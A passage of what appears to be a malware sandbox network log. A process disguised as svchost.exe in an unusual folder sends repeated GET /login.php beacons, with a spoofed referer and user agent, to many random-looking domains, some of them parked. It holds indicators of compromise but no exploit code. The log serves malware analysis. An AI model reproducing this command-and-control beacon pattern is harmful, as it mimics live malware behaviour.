                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: 106.15.232.163:8000
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Nov 11, 2024 18:26:02.100539923 CET722INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: openresty/1.21.4.3
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:26:01 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 561
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                          64192.168.2.85355564.225.91.7380
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.718280077 CET324OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: galynuh.com
                                                                                                                                                                                                          If-Modified-Since: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                                                                                                                                          If-None-Match: "63f68860-251"
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.273001909 CET165INHTTP/1.1 304 Not Modified
                                                                                                                                                                                                          server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:26:04 GMT
                                                                                                                                                                                                          last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                                                                                                                                          etag: "63f68860-251"


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          65192.168.2.85355676.223.67.189801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.842987061 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qexyhuv.com
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.267445087 CET259INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:26:04 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 114
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          66192.168.2.857970103.224.212.210801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:26:03.996807098 CET277OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyxynyx.com
                                                                                                                                                                                                          Cookie: __tad=1731345856.5241611
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.544084072 CET244INHTTP/1.1 302 Found
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:26:04 GMT
                                                                                                                                                                                                          server: Apache
                                                                                                                                                                                                          location: http://ww25.lyxynyx.com/login.php?subid1=20241112-0426-0467-9c46-ef7d79ef9150
                                                                                                                                                                                                          content-length: 2
                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                          connection: close
                                                                                                                                                                                                          Data Raw: 0a 0a
                                                                                                                                                                                                          Data Ascii:


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          67192.168.2.853557103.224.182.252801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.015799999 CET277OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: vofycot.com
                                                                                                                                                                                                          Cookie: __tad=1731345856.5179536
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.455413103 CET242INHTTP/1.1 302 Found
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:26:04 GMT
                                                                                                                                                                                                          server: Apache
                                                                                                                                                                                                          location: http://ww16.vofycot.com/login.php?sub1=20241112-0426-044d-b465-1d078f2f97da
                                                                                                                                                                                                          content-length: 2
                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                          connection: close
                                                                                                                                                                                                          Data Raw: 0a 0a
                                                                                                                                                                                                          Data Ascii:


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                          68192.168.2.85797144.221.84.10580
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.045885086 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gadyciz.com
                                                                                                                                                                                                          Cookie: btst=5e81f1ad7c4a96c1877df991163ec825|66.23.206.109|1731345856|1731345856|0|1|0; snkz=66.23.206.109
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.475816011 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:26:04 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=5e81f1ad7c4a96c1877df991163ec825|66.23.206.109|1731345964|1731345856|54|2|0; path=/; domain=.gadyciz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          69192.168.2.857972154.85.183.50801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.185092926 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyval.com
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.993554115 CET307INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:26:04 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 138
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          ETag: "663ee226-8a"
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.995773077 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyval.com
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.281321049 CET307INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:26:05 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 138
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          ETag: "663ee226-8a"
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          70192.168.2.85797364.190.63.136801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.887339115 CET348OUTGET /login.php?sub1=20241112-0426-044d-b465-1d078f2f97da HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: ww16.vofycot.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cookie: __tad=1731345856.5179536
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.648591042 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:26:05 GMT
                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                          transfer-encoding: chunked
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                          cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                          pragma: no-cache
                                                                                                                                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_Q1k8kRQkx7GYldKqm6G66ZCGDPL+fk/3vRypBjrJ9ShFMKyCkbf+DQKz062LphT3LNwViHoDPbAaUnXL159X0g==
                                                                                                                                                                                                          last-modified: Mon, 11 Nov 2024 17:26:05 GMT
                                                                                                                                                                                                          x-cache-miss-from: parking-7596689c44-xfc25
                                                                                                                                                                                                          server: Parking/1.0
                                                                                                                                                                                                          Data Raw: 32 45 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 51 31 6b 38 6b 52 51 6b 78 37 47 59 6c 64 4b 71 6d 36 47 36 36 5a 43 47 44 50 4c 2b 66 6b 2f 33 76 52 79 70 42 6a 72 4a 39 53 68 46 4d 4b 79 43 6b 62 66 2b 44 51 4b 7a 30 36 32 4c 70 68 54 33 4c 4e 77 56 69 48 6f 44 50 62 41 61 55 6e 58 4c 31 35 39 58 30 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 76 6f 66 79 63 6f 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 54 68 69 73 20 77 65 62 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: 2E2<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_Q1k8kRQkx7GYldKqm6G66ZCGDPL+fk/3vRypBjrJ9ShFMKyCkbf+DQKz062LphT3LNwViHoDPbAaUnXL159X0g==><head><meta charset="utf-8"><title>vofycot.com&nbsp;-&nbsp;This website is for sale!&nbsp;-&nbsp;vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and bes
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.648691893 CET1236INData Raw: 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d
                                                                                                                                                                                                          Data Ascii: t source for all of the information youre looking for. From general topics to more of what you would expect to find here, vofycot.com AEChas it all. We hope you find what you are searching for!"><link rel="icon" type="im
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.648703098 CET1236INData Raw: 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 69 6d 67 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65
                                                                                                                                                                                                          Data Ascii: lay:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visib
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.648852110 CET1236INData Raw: 74 74 6f 6e 3b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 7d 64 65 74 61 69 6c 73 2c 6d 65 6e 75 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70
                                                                                                                                                                                                          Data Ascii: tton;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.anno
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.648864985 CET1236INData Raw: 20 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73
                                                                                                                                                                                                          Data Ascii: a{font-size:10px}.container-disclaimer__content-text{color:#949494}.container-disclaimer a{color:#949494}.container-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.648880005 CET1236INData Raw: 74 65 78 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a
                                                                                                                                                                                                          Data Ascii: text{margin-top:10px;margin-right:0px;margin-bottom:5px;margin-left:0px;font-size:larger}.container-cookie-message a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,.75);top:0;right:0;bottom:0;left:0;-webkit-tr
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.648895025 CET1236INData Raw: 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 62 74 6e 2d 2d 73 75
                                                                                                                                                                                                          Data Ascii: ackground-color:#218838;border-color:#218838;color:#fff;font-size:initial}.btn--success-sm:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:initial}.btn--secondary{background-color:#8c959c;border-color:#8c959c;color:#ff
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.649228096 CET36INData Raw: 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 3b 74 72 61 6e 73 66 6f 72 6d
                                                                                                                                                                                                          Data Ascii: transform:translateX(26px);transform
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.649271965 CET1236INData Raw: 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 7d 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 65 31 36 32 65 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 56 65 72 64 61 6e
                                                                                                                                                                                                          Data Ascii: :translateX(26px)}body{background-color:#0e162e;font-family:Arial,Helvetica,Verdana,"Lucida Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:20px;padding-left:5%;padding-right:5%;padding-bottom:
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.649282932 CET1236INData Raw: 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 7a 2d 69 6e 64 65 78 3a 2d 31 7d 2e 63 6f 6e 74 61
                                                                                                                                                                                                          Data Ascii: orm:scaleX(-1);-webkit-transform:scaleX(-1);transform:scaleX(-1);z-index:-1}.container-content--lp{min-height:720px}.container-content--rp{width:100%;min-height:820px;margin:0}.container-content--twot{min-height:720px}.container-content--twot
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.653721094 CET1236INData Raw: 65 72 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 0d 0a 41 45 43 0d 0a 5f 68 65 61 64 65 72 2d 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 39 66 64 38 30 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 77 65 62 61 72 63 68 69 76 65 2d
                                                                                                                                                                                                          Data Ascii: er}.webarchive-block_AEC_header-link{color:#9fd801;font-size:20px}.webarchive-block__list{padding:0}.webarchive-block__list-element{word-wrap:break-word;list-style:none}.webarchive-block__list-element-link{line-height:30px;font-size:20px;c


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          71192.168.2.857974199.59.243.227801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:26:04.950685978 CET350OUTGET /login.php?subid1=20241112-0426-0467-9c46-ef7d79ef9150 HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: ww25.lyxynyx.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cookie: __tad=1731345856.5241611
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.378601074 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:26:04 GMT
                                                                                                                                                                                                          content-type: text/html; charset=utf-8
                                                                                                                                                                                                          content-length: 1230
                                                                                                                                                                                                          x-request-id: 5450a102-4178-42f0-afb6-0ca64284b6c5
                                                                                                                                                                                                          cache-control: no-store, max-age=0
                                                                                                                                                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QpNJdqUhZXnXlrq/8H6wuNUKASxlqJ3BCCrAIz168Ow6tRjKayJDs6tqR9ZIw71ONf1TUssBozjso789OHLhhQ==
                                                                                                                                                                                                          set-cookie: parking_session=5450a102-4178-42f0-afb6-0ca64284b6c5; expires=Mon, 11 Nov 2024 17:41:05 GMT; path=/
                                                                                                                                                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 51 70 4e 4a 64 71 55 68 5a 58 6e 58 6c 72 71 2f 38 48 36 77 75 4e 55 4b 41 53 78 6c 71 4a 33 42 43 43 72 41 49 7a 31 36 38 4f 77 36 74 52 6a 4b 61 79 4a 44 73 36 74 71 52 39 5a 49 77 37 31 4f 4e 66 31 54 55 73 73 42 6f 7a 6a 73 6f 37 38 39 4f 48 4c 68 68 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QpNJdqUhZXnXlrq/8H6wuNUKASxlqJ3BCCrAIz168Ow6tRjKayJDs6tqR9ZIw71ONf1TUssBozjso789OHLhhQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                                                                                                                                                                          Nov 11, 2024 18:26:05.378618002 CET664INData Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
